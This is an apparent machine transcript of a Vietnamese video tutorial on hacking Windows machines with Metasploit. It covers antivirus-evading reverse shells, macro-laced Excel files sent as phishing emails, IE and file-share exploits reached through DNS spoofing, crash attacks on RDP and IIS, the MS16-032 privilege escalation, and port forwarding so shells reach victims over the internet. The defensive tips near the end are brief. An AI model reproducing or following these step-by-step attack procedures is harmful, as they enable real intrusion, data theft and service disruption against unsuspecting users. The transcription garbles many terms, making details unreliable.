Rồi Microsoft này, Kaspersky, rồi rất nhiều các cái ứng dụng virus khác có thể là không phát hiện ra được con cell này. Đấy, bây giờ tôi thử tấn công với con cell này. MSF console. Rồi. Và vẫn với kiểu như vậy, yêu exploit set, lẽ ra phải làm một cái script đúng không ạ, để tấn công cho nó nhanh. Set lhot
Rồi, đấy, rồi. Chạy. Ok, thành công, đúng không ạ? Đấy, vậy là với con SEO này thì đã được mã hóa dưới ngôn ngữ Python. Thì bây giờ với những cái trường hợp như này chúng ta thấy là rất khó có thể là phòng chống. Là một người quản trị hay là IT thì chúng ta sẽ phải có một số thủ thuật như là phòng chống một cách thủ công, chứ antivirus là không phát hiện ra được. Thì theo tôi thì tôi sẽ dùng một số những cái ứng dụng, bởi vì khi mà connection được tạo ra trên, khi mà máy bị tấn công thì sẽ tạo ra các connection để tới máy hacker, đúng không ạ? Tôi hoàn toàn có thể view connection ra bằng một số phần mềm như TCP view. TCP view. Hoặc là chúng ta có thể sử dụng CMD cũng ra được. Nestat trừ n. Đấy, kiểm tra xem question hai question lạ với port 444 kết nối tới máy chấm 100. Để mà queue được tiến trình này thì chúng ta dùng cái chương trình đó là TCP view. Xem có port 44 question chuột phải vào end process 44 này. Được chưa? Rồi, với phương pháp tiếp theo khi mà dùng vây kết hợp với lại macro để bơm code macro vào trong Office, thì đầu tiên tôi sẽ phải có một cái code của Microsoft, thì đây tôi đã chuẩn bị sẵn. Microsoft Master. Rồi, giải nén thành công. Đào từ đường link này, sau đó giải nén và dùng vây. Tiếp theo là dùng vây để kết hợp với Microsoft. Rồi chạy vây chấm chấm suộc. Rồi yêu và chọn power cell. Power cell đây option bao nhiêu? 21. À, 23. Rồi sẽ revert HTTPS 23. Rồi set những cái option cần thiết, đúng không ạ? Đây, vài hướng dẫn. Set lhost vnodes và chọn backdoor. Nhập tên backdoor. Rồi chọn address. Đây, lboard thì mặc định nó dùng 8443 nữa. Nhập đường dẫn
nhập tên của con MacDo 84 đi. Chúng ta chú ý ở đây chúng ta chỉ nhập tên thôi ạ. Tên của MacDo. Và nó sẽ tạo ra một cái file hưng84.bat theo đường dẫn này. Đấy, bây giờ chúng ta sẽ kết hợp với lại Microsoft thì mở thêm một cửa sổ nữa. Ok, CD cấp phép đã CSmod cho CD về desktop. Tôi đã rs này. Rồi, giải nén ra Microsoft đây, CHmod 755 chữ R Microsoft Master. Ok, CD vào Microsoft Master LS. Ok. Rồi, sau đó chạy macroset.py và đường dẫn của để convert cái file path này thành txt, lưu ra file txt. Đấy chính là code của macro. Chạy chấm suộc macro set.py. Rồi sau đó đường dẫn của file chấm path vừa rồi tạo ra ở vây. Rồi và nhập vào đường dẫn hay là tên của file .tt macro.tt. Đấy, ok, đây chính là nội dung của file macro.tt. Đấy, và chúng ta hoàn toàn thể copy nội dung này vào trong Office, đúng không ạ? Trong bộ Office, giả sử trong Win 7. Tôi dùng Office 2010 và trong 2016 cũng hoàn toàn có thể sử dụng được. Rồi, và chúng ta mở file txt nằm đâu? Trong thư mục Macro Master này. Mở file macro.txt. Ok, copy nội dung. Chúng ta copy toàn bộ nội dung từ đây. Đây là tên nhé, tên của macro chúng ta có thể đổi đi. Để tôi copy file txt này ra ngoài ạ. Sau nó dùng cái máy Win 7. Tôi dùng Excel bây giờ. Thì trong Excel chúng ta phải mở cái tab Development vào Excel Option. Rồi vào Customize Report. Tích vào Connection Development. Developer. Để xuất hiện thanh Developer và Virtual Basics. Zbook đúng không ạ? Rồi sau đó là paste cái code của macro vào đây. Rồi ok. Sau đó chúng ta thực hiện xếp vào. Xếp dưới dạng rồi. Desktop.
Rồi thành công. Đấy, vậy là tôi đã tạo ra được một file là Hưng TN. Được chưa? Và trong trường hợp này tôi sẽ thực hiện tấn công máy Win 7 hoặc là bất kỳ một máy nào mà nhận được cái file tôi vừa tạo ra, nhận được và kích hoạt thì có thể gửi thông qua mail, bên kia nhận được mở ra thì sẽ bị tấn công. Và các option cần set cho tấn công này như sau. Đây là kiểu tấn công rất hay. Đấy, và theo nhận định thì các hacker sử dụng cái kiểu tấn công này nhiều, rất nhiều và có thể xâm nhập vào hệ thống. Bất kỳ hệ thống nào khi mà người dùng ở trong hệ thống đó là chủ quan, đúng không ạ? Có thể là hacker sẽ giả mail của một cái nhà của một người vị trí cao ở trong công ty, ví dụ như là tổng giám đốc hay là chủ tịch tập đoàn, hay là giả mail của người quản trị hệ thống IT trong công ty, đúng không ạ? Gửi cho hàng loạt các nhân viên nào mà kích vào cái mở cái mail này ra và mở cái file mà hacker gửi thì ngay lập tức máy sẽ bị chiếm quyền sở hữu và bị giám sát và mất rất nhiều dữ liệu trên đó. Đấy là một trong những cách xâm nhập hệ thống của và thường xuyên xảy ra, hacker thường xuyên sử dụng. Rồi, à, với payload của cái kiểu tấn công này. Đấy, chúng ta chú ý. Set payload window master return revert https. Set lhot show option. Với cái payload HTTPS thì các option của nó là 843, ok, exploit, và chúng ta sẽ đợi. Đấy, giả sử trong trường hợp này ông victim sử dụng máy Win 7, mở file Excel lên, rồi chúng ta thấy là thành công, đúng không ạ? Đây, sysinfo Windows 7 được chưa, chiếm toàn quyền sở hữu. Data, download thử data về. Rồi, xem có gì trong này. Rồi, thành công, đúng không ạ?
Còn đây, đây là tôi thử với cái máy Windows 10 Asus. Xóa file. Gửi cái file này sang máy Victim. Giả sử tôi dùng Windows 10 gửi sang máy Win 10. Đó. Exploit. Mở file. Rồi ok, thành công. Sys info Windows 10 và chiếm toàn quyền sở hữu, đúng không? Vậy là với cách tấn công này chúng ta thấy rất nguy hiểm khi mà nhận được các tài liệu mà và chúng ta thấy là antivirus trong trường hợp này cũng không phát hiện được. Đấy. Và khi mở các tài liệu ra thì chúng ta đối với những cái nhân viên bình thường chúng ta rất khó phát hiện, bởi vì rất có thể là đây là một lỗ hổng trong những cái ứng dụng như thế này. Hacker có thể bơm những cái tiêm những cái mã độc vào các chương trình trong cái code macro hoặc là Visual Basic của Office, đúng không ạ? Giả sử tôi gửi mail cho ai đó trong hệ thống nhận mail này, mở file tài liệu này ra là bị dính ngay. Rồi sau đó bây giờ tôi sẽ hướng dẫn các bạn còn một vài cái kiểu tấn công nữa, như là tấn công hệ điều hành Windows 7 dựa trên lỗ hổng IE. Thì kịch bản là làm thế nào từ Win 7 truy cập Facebook bằng IE thì sẽ bị chiếm quyền. Đấy, thì đây tôi sẽ demo tiếp hai kiểu tấn công nữa, hai lỗ hổng nữa cho các bạn. Sau đó là sang kiểu tấn công DDoS và cuối cùng là chúng ta sẽ setup, tôi sẽ hướng dẫn các bạn là setup cái hệ thống setup cái hệ thống sử dụng Metaploit tấn công thông qua môi trường Internet. Một số lỗ hổng này liên quan tới revert nữa, đó là tấn công Win7. Trên máy Win7 có một lỗ hổng rất nghiêm trọng trên hệ điều hành Win7, đó là lỗ hổng trên ứng dụng Internet Explorer, lỗ hổng mang mã lỗi MS16 10046. Thì bây giờ tôi mở NF console. Rồi sau đó là tôi search, đúng không ạ, lại trở lại cái kiểu search MS10 ship trừ 046. Rồi ok, sau đó yêu mã lỗ hổng thì chúng ta chú ý ở đây nó sẽ có hai kiểu tấn công, đó là tấn công thông qua trình duyệt IE trực tiếp luôn. Thì với kiểu tấn công này thì hacker sẽ gửi cho victim một đường link, trên hacker dựng sẵn một website, sau hacker gửi cho victim một đường link của website đó, và khi mà victim click vào cái đường link đấy, ngay lập tức nó sẽ redirect sang giao thức SMP và truy cập vào file server ở trên máy hacker. Đó. Và sau đó là download một cái con backdoor về. Và khi download về và chạy backdoor thì lại tạo ra reverse shell. Đấy. View này. Sau set payload.
Đợi một chút ạ. Xét tiếp LH rồi xét tiếp một option nữa mà rất mới, đó là xét SRVH. SRVH là server host, tức là cái web server mà hacker dựng sẵn. Trong trường hợp này thì xét luôn địa chỉ IP của Kali. Show option xem còn cái gì nữa không ạ. Rồi ok xong. Và exploit. Ok, nó sẽ tạo ra một đường link như này. Nếu như mà victim mà click vào đường link này thì ngay lập tức sẽ bị dính. Đấy, tuy nhiên là victim họ sẽ không dạy gì mà click vào đường link này, đúng không ạ? Đấy, và bằng nhiều phương pháp hacker có thể đánh lừa victim click vào. Ví dụ như sử dụng phương pháp DNS spoof. Hoặc là gửi cái link này thông qua Gmail, đúng không? Xong là giả lập text display, victim mở mail ra click vào cái đường link thì ngay lập tức sẽ truy cập vào và download con backdoor về và chạy. Đây ví dụ dùng DNS spoof thì tôi sẽ làm cho cái victim là in 7 này cứ khi sử dụng IE mà truy cập vào Facebook thì sẽ bị dính. Một cách như sau, đó là tạo ra các bản ghi giả trong dùng EtherCAT. Rồi tạo ra bản ghi giả như là Facebook chẳng hạn. Copy của đoạn Microsoft. Rồi IP ở đây là IP của máy hacker. Ok, sau đó là bơm những bản ghi giả này vào DNS server mà victim đang dùng. Chúng ta chú ý là trong trường hợp này chỉ có bơm vào DNS local thôi. Nghĩa là victim mà đang sử dụng DNS nào để chế độ động nó sẽ lấy default lấy từ con địa chỉ DNS là con router cấp xuống, đúng không? Thì bơm thẳng vào con ADSL. Tôi sẽ bơm như sau này. Dùng EtherCAT tiếp trừ snip file sniffing ETH0. Sau đó vào plugin manage plugin và DNS spoof. Ok. Rồi, sau đó chúng ta xem kết quả. Ông victim Win7 sử dụng trình duyệt
Internet Explorer. Truy cập vào facebook.com. Đây, session 2 open đúng không ạ? Session chữ y cách 2 in ID sys info. Rồi, đúng in 7 rồi. PVD. Ok, cdc2.ls. Rồi, đến đây thì chúng ta làm gì cũng được đúng không ạ? Đó là lỗ hổng trên Win 7 liên quan IE MS10016. Tiếp theo lỗ hổng, một lỗ hổng nữa liên quan tới file server, đó là MS15020. Lỗ hổng này cũng rất nghiêm trọng. Đấy, và tấn công cũng rất chủ động. Và tôi sẽ tạo kịch bản như sau. Với MS15020 thì đầu tiên phải tạo ra một file server. Trong trường này tôi dùng file server trên Windows Server 2008. Đấy, bằng cách này. Tạo thư mục data. Tôi lấy ví dụ như là hay tạo thư mục IT đi. Rồi sau đó tôi thực hiện chia sẻ thư mục IT này cho những người dùng trong phòng ban IT, đúng không ạ? Vậy là giả sử tôi tạo kịch bản như có một OU IT này. Rồi tạo user U1 đi. Và rõ ràng là với người dùng, những người dùng trong phòng ban IT thường là quản trị viên sẽ cho những người dùng này có giấy phép được đẩy dữ liệu lên cho cả admin mà. U1 này. Được phép đẩy dữ liệu trên folder IT, đúng không ạ? Đẩy là giấy phép trên. Rồi trong task qt nâng nhóm user này lên thành modify. Ok, sau đó tôi sẽ thực hiện kiểu tấn công này như sau. Kiểm tra xem IP của máy này đã. Rồi và search MS15020, đây là lỗ hổng rất nghiêm trọng. Nhắc lại là rất nghiêm trọng. Chúng ta xem kịch bản tấn công, chúng ta sẽ biết cái mức độ nghiêm trọng của nó như thế nào.
Album này rất mới ạ, năm 2015 đúng không ạ? Đây, chúng ta dùng kiểu tấn công này. Yêu. Set payload. Master printer private. TCP set lhot rồi set tiếp đấy, show option ra show option SRV hot đúng không ạ, SRV hot rồi chúng ta hoàn toàn thể set file name, nếu không thích file name là mnf.link có thể file khác. Đấy, nhưng tuy nhiên là đây nó có sẵn rồi, sau đó chúng ta thực hiện exploit tấn công thì nó sẽ tạo ra ở đường dẫn này một cái file tên là msf.link, đây thực ra nó là một link, và sau đó gửi cái link này tới file server đây, và tôi mở tiếp một cửa sổ khác thực hiện copy cái link này ra ngoài desktop suộc root nhé, suộc root suộc desktop. Rồi. Và sau khi copy link ra desktop, tôi sẽ gửi cái file link này lên file server. Truy cập vào file server. Thì rõ ràng giả sử tôi là một người dùng trong phòng ban IT U1, tôi sẽ có giấy phép trong folder IT và tôi copy file link này vào đây. Ok. Sau khi copy thành công rồi, một bảy tám nhé, các bạn nhớ là cái máy 178. Thì bắt đầu tôi sẽ giả sử như mà một ai đó truy cập và mở cái folder IT ra, ví dụ này. Mở folder IT ra đấy, và ngay lập tức sẽ reverse shell về đây 178 này, session 3. Chúng ta kiểm tra lại session trừ y cách 3 rồi sysinfo kiểm tra xem máy gì, Windows Server 2K8 Switchback 2 đúng không ạ. Đấy, và bây giờ là chiếm toàn quyền, có thể lấy cell về. Hay là cell remote desktop cũng được. Run trừ e. Rồi.
rồi, đoạn ghép gửi chữ U cách ra. Sale. Đấy. Sau đó là user add cách ra U3 chẳng hạn. User add user à, xin lỗi, DS user U3 CN bằng U3 phẩy OU bằng IT phẩy DC bằng ABC phẩy DC bằng con trừ P với đúp D. Bên sai chúng ta tiếp tục tấn công chiếm quyền sở à, rồi cái này chúng ta sẽ setup sau này. Bây giờ có thể tấn công DDoS một vài máy chủ. Đấy. Cái kiểu thứ ba nó dùng DDoS thì chúng ta ví dụ như đi đốt lỗ hổng MS12020. Hiện nay ở ngoài Internet rất nhiều website đang bị lỗ hổng này, nó chưa vào. Và lỗ hổng này nó ảnh hưởng từ hệ điều hành Windows Server 2008 trở về trước. Rồi ví dụ tôi tấn công luôn cái máy Windows Server 2008 vừa rồi. IP là bao nhiêu? Xem lại. Một bảy tám. Rồi, có thể là search này MS12 SHIFT-020. Vừa rồi tấn công 2K8 thì tôi đã enable remote desktop trên máy 2K8. Thì khi mà enable trên remote desktop lên thì trên máy này sẽ bị gặp phải một lỗ hổng liên quan giao thức remote desktop. Hacker sẽ gửi hàng loạt các yêu cầu remote desktop tới máy chủ 2K8 và làm cho nó xử lý không kịp, tràn bộ đệm và xảy ra hiện tượng màn hình xanh. Rồi, cái code bên dưới là để check. Chúng ta có thể yêu này. Để check xem cái máy 178 có bị không. Set rhost chúng ta thể check nhiều máy đúng không ạ? Đây và cái địa chỉ IP này bị dính lỗ hổng này và khi bị dính rồi tôi lại yêu sử dụng kiểu tấn công. Tấn công thì cái đốt ở trên set rhost
Exploit, chúng ta xem kết quả. Đây, màn hình xanh. Rồi, đấy là những cái lỗ hổng rất là nghiêm trọng. Còn một lỗ hổng nữa, MS15034, lỗ hổng liên quan tới ứng dụng Internet Formation Service. Cụ thể ở đây chính là cái file http.sys của IIS. Lỗ hổng này cũng liên quan tới tràn một hệ, và cũng xảy ra ảnh hưởng của nó là xảy ra là lỗ hổng này là lỗ hổng đốt và làm cho máy từ xa sẽ bị, hay là server từ xa bị lỗ hổng này sẽ bị treo vào hiện tượng màn hình xanh. Search 15. Đấy, tôi thử tấn công máy Windows Server 2012 R2 xem IP 164, và trên máy này tôi đã cài sẵn Internet Permission Service. Có rất nhiều cách tấn công, tuy nhiên chúng ta có thể dùng Metaploit để tấn công lỗ hổng này, khai thác và tấn công lỗ hổng này. Rồi, chỗ này tôi sẽ sử dụng U này. Đoạn tấn công đốt. Và đây là tấn công đốt nên là không có payload đúng không? Payload là chúng ta phải khái niệm định nghĩa lại cái payload đúng không? Gói tin để mà điều khiển victim, nhưng đây là đốt là đánh sập victim. Rồi, set rhost là tấn công luôn. Exploit để tấn công thành công. Đây, màn hình xanh đúng không? Lỗ hổng này sẽ ảnh hưởng tới các hệ điều hành. Đây, chúng ta có thể show target. No exploit module select. Lỗ hổng này liên quan tới liên quan tới file http.sys từ Internet Permission Service 8.5 trở về trước. Rồi tiếp tục rất nhiều lỗ hổng đúng không ạ? Lỗ hổng MS16032 cũng rất nghiêm trọng. Và đây cũng là một lỗ hổng rất mới. Và với lỗ hổng này thì không liên quan gì tới Metaploit. Tuy nhiên tôi cũng sẽ hướng dẫn thêm cho các bạn. Đấy, bây giờ cách thức để khai thác và tấn công lỗ hổng này, hay là cái ảnh hưởng của lỗ hổng này như sau. Với một user thường không có quyền gì trong hệ thống, nhưng khi khai thác và tấn công thì user đó hoàn toàn có thể nâng quyền hệ thống lên, nâng quyền của user đó thành quyền hệ thống. Tôi lấy ví dụ kịch bản như sau. Đối với máy chủ sử dụng máy Windows Server 2012, tôi tạo kịch bản đó là tạo ra một user thường ở trên máy client. Đây cũng là một tình huống mà các bạn có thể sử dụng cứu trợ cho máy tính của mình, nhất là đối với các hệ điều hành Windows 10. Đó là tình huống giả sử như chúng ta có một máy laptop mà BIOS bị khóa, tức là đặt bát của BIOS, rồi trong BIOS họ lại set up là chế độ khởi động, đó là chế độ UEFI đúng không ạ? Rồi ngoài ra nữa, chính vì thế là chúng ta sẽ không, rất là khó có thể boot được vào những cái công cụ để mà phá path của admin hay là nâng quyền admin, nâng quyền hệ thống. Đấy. Vậy là
với tình huống đó thì chúng ta đành phải bó tay rồi. Có thể là dùng tới sự trợ giúp của hãng, đúng không ạ? Hoặc là phá bát BIOS thông qua phần cứng. Đấy, giả sử trong tình huống này, tôi sẽ tạo ra một user. User là Hưng tên hờ. Và user này được tạo ra thì mặc định nó không thuộc nhóm admin, nó chỉ thuộc nhóm user, và nhóm này là một nhóm bình thường, không có quyền gì hết. Chúng ta kiểm tra này, được chưa? Và không thể vượt qua được chế độ user account control default trên các hệ điều hành. Rồi sau đó log on bằng user thường này. Đấy, và với user thường này thì chúng ta không làm gì được. Ngay kể cả chỉnh địa chỉ IP cũng không chỉnh được. Nó đòi phải user admin, nhưng chúng ta giả sử không có user admin chẳng hạn. Hoặc admin bị disable. Đấy, và cũng không thể phá được path của admin bởi vì BIOS khóa và chế độ legacy không được in, đúng không? Vậy là chúng ta sẽ thực hiện khai thác lỗ hổng MS16032 để nâng quyền của user thường thành user admin. Cách thức tấn công như sau. Bước 1 là chúng ta sẽ download cái đây ở trên trang exploit.db, download cái đoạn mã tấn công về vào trang này. Rồi, đây liên quan tới PowerShell, đúng không ạ? Rồi download hoặc là copy cái code này lưu thành file .py. À xin lỗi, lưu thành file .ps1. Ở đây người trong cái đoạn mã này người ta cũng hướng dẫn ta cách tấn công. Rồi sau khi download xong rồi, chúng ta copy rồi và có thể mở PowerShell hoặc CMD trên máy này lên. PowerShell thực hiện import module. Tôi sẽ thực hiện câu lệnh đó là import module trừ module, sau đó là xin lỗi cd về desktop, thực hiện câu lệnh import trừ module, sau đó chấm suộc tên của module 39. Rồi import thành công. Import thành công rồi thì tiếp tục là invoke, dùng câu lệnh invoke trừ ms 16032. Đây nó chỉ áp dụng yêu cầu mà hai con nâng máy này lên. Đấy thì máy của chúng ta bây giờ hầu hết là chip 2 core rồi. Rồi sau đó thực hiện lại. Đợi một chút thì nó sẽ bật ra một cửa sổ CMD. Cửa sổ này với quyền hệ thống, quyền cao nhất của hệ thống. Và với quyền cao nhất của hệ thống này thì tôi hoàn toàn có thể tạo ra user mới hoặc nâng user của tôi lên thành quyền admin bằng cách add nó vào nhóm admin bằng câu lệnh net
local group rồi thành công đúng không ạ? Net user kiểm tra lại tên ở rồi đã là thành viên của nhóm admin rồi. Khi mà là thành viên nhóm admin hoàn toàn có thể đổi được path của user admin luôn. Rồi đổi thành công đúng không ạ? Đấy. Sau đó tôi logout lại. Logout lại bằng user hưng tn. Chúng ta xem hưng tn bây giờ đã là quyền user admin. Và với quyền user admin thì làm gì cũng được đúng không? Đấy, chỉnh IP. Đổi luôn cả path cho user admin luôn. Commuter management. Kiểm tra này, member. Rồi, ok. Reset path luôn. Ok, thành công đúng không ạ? Đấy. Vậy là một loạt những cái lỗ hổng rất nguy hiểm mà tôi đã giới thiệu cho các bạn. Thì đấy là cách thức để tấn công. Cách phòng chống thì chúng ta nên sử dụng các hệ điều hành bản quyền để được hỗ trợ tốt nhất các bản phá lỗi từ nhà cung cấp. Như là hệ điều hành Windows thì sẽ luôn luôn mở chế độ Automatic Update để update các bản phá lỗi từ Microsoft. Hoặc là chúng ta có thể thủ công tìm cái mã lỗ hổng ở trên trang TechNet Microsoft và download bản phá lỗi về và thủ công cài đặt. Còn đối với cái kiểu tấn công reverse shell thì tôi khuyến cáo các bạn đó là dùng những cái chương trình antivirus. Đầu tiên chúng ta trên máy phải có antivirus mạnh nhất và update thường xuyên. Trong trường hợp antivirus không thể tìm kiếm và phát hiện được những con reverse shell như vậy thì chúng ta thỉnh thoảng chúng ta sẽ view ra những cái TCP connection view ở trên máy của chúng ta kết nối ra ngoài để xem là kết nối tới những địa chỉ IP nào và những cái port nào nó nghi khả nghi đúng không ạ? Chúng ta sẽ kill cái process của nó đi. Rồi và tiếp theo nữa là tôi sẽ hướng dẫn các bạn, cái này rất quan trọng, đó là setup một hệ thống mà có thể tấn công được qua mạng internet bằng Metaploit. Đấy thì các bước setup như sau. Đấy, các bạn chú ý là dùng để tham khảo thôi. Thứ nhất là tôi luôn luôn là dùng cái port, đó là giả sử tôi dùng port 404 chẳng hạn để tấn công những kiểu tấn công reverse shell. Thì khi đó trên cái modem của tôi, ví dụ đây tôi có modem TP-Link, chúng ta sẽ vào logon vào modem này. Sau đó vào phần forwarding. Được chưa? Thứ nhất là giả sử đây tôi mở TeamView lên. Đây giả sử trên máy này tôi đã dựng sẵn một cái hệ thống tấn công. Đấy, chúng ta đầu tiên nhá, ở trên máy chúng ta sẽ để có một cái cài sẵn VMware này, có hệ điều hành Kali 2016 này. Rồi setup các mạng để chế độ bridge này. Yeah, ok, sau đó setup một địa chỉ IP tĩnh trùng với lại cái địa chỉ IP chung giải với địa chỉ IP máy thật này. Đây rồi, đây máy này là chấm 200 đúng không ạ?
Máy này tôi set là giả sử như là IF config lại. Đây, địa chỉ máy này là .150 để bridge và đặt chung giải IP với lại máy ngoài. Đấy, sau khi mà setup về IP xong rồi, đấy, thì trên máy này tôi sẽ thực hiện đó là MSF console, tức là hướng trước các cuộc tấn công, các cái connection kết nối về. Ở đây tôi sẽ dùng cái port 444 thì trên modem, trên con modem đây. Bây giờ trên con modem thì tôi sẽ thực hiện là add này. Add thì thứ nhất đó là service port cho 444 vào đây. Rồi sau đó IP address. IP address là IP của máy Kali đúng không? .150. Rồi và xếp vào. Ok. Đấy, sau khi xếp thành công rồi thì chúng ta sẽ được cái thông số như này. Tức là nát được thành công cái máy 150 với port 44 ra ngoài IP public của modem. Rồi. Và khi đó chúng ta sẽ tạo ra các cái con reverse cell. Tạo ra reverse cell thì trong bài vừa rồi tôi đã hướng dẫn rồi. Tuy nhiên là chúng ta phải chú ý reverse cell thì cái lhot phải là địa chỉ IP của máy IP public đầu ngoài modem của chúng ta. Đây. Bây giờ tôi sẽ dùng chương trình shelter để tạo thử. Dùng shelter để tạo. Rồi, sau đó là chọn No Steam Mode là một set lhot rất quan trọng. Lhot chính là địa chỉ IP public. IP public đây ạ. À. Trong trường hợp mà cái địa chỉ này nó là public động, nó luôn luôn thay đổi thì chúng ta sẽ phải sử dụng một số cái dynamic DNS để update như là no IP hoặc dynamic dns.org. lhot này. Rồi điện localhost. Lport thì tôi ở trên modem tôi đã nát 444 ra ngoài đúng không? Thì chỗ này phải set là 444. Rồi thành công. Đây. Con Putty đã được pin code vào đúng không ạ?
Rồi, vậy là tôi nhắc lại công việc của chúng ta bao gồm 3 bước. Bước đầu tiên để setup hệ thống tấn công qua Internet. Bước đầu tiên là chúng ta dựng máy Kali để chữa các mạng break. Đó. Sau đó nát bọt. Nát bọt 44 của máy Kali ra ngoài kèm theo địa chỉ IP Kali. Bước thứ hai tạo ra những con reverse shell và phát tán, đúng không? Gửi tới máy victim. Thì reverse shell đó thì trong cái chúng ta sẽ cần chú ý tới hai option, đó là lport phải là 41. Lhot tức là địa chỉ IP local phải là IP public trên modem, tức là IP giống này. Ở đây. Được chưa? Đấy, khi mà victim chạy con reverse shell này thì nó sẽ gửi tạo ra một connection tới cái địa chỉ IP public đầu ngoài modem của chúng ta với port 44, sau đó là modem sẽ lắng nghe và forward vào trong. Đấy, thì trong trường hợp này tại máy, xin lỗi, không phải máy. Đây, đây là hệ thống từ xa. Đấy. Tại máy Kali thì chúng ta sẽ set các option như sau để tấn công, để nhận correction. Đó là use, exploit, use này. Multi handler set payload master filter revert TCP set. Ở chỗ này lport mặc định nó là đang set 4444 rồi. Thì bây giờ chúng ta sẽ set lhot, đúng không ạ? Lhot chúng ta chú ý trong cái trường này lhot vẫn là địa chỉ IP của máy Kali. Tại sao lại như vậy? Thì khi mà modem nó nhận được cái yêu cầu kết nối của victim thì ngay lập tức nó forward vào trong địa chỉ này. Thì địa chỉ này vẫn nhận, đúng không ạ? 192.168.0.150 và thực hiện exploit. Giả sử trong trường hợp này tôi sẽ chạy con booty, con backdoor. Chúng ta xem. Rồi, và đã tấn công được đấy, thông qua Internet. Đây, thực hiện một connection này tới địa chỉ IP public đầu ngoài. Đó. Sysinfo chính máy Win 10 luôn. Đó. Ok, bài trình bày của tôi đến đây là hết. Thì chắc là còn một số cái vấn đề nữa thì trong quá trình học những cái bài tiếp theo thì tôi sẽ nói sau. Bài khá dài, thực hiện hơn 2 tiếng mà bây giờ đã là 6 giờ 07 phút sáng. Rất là mệt.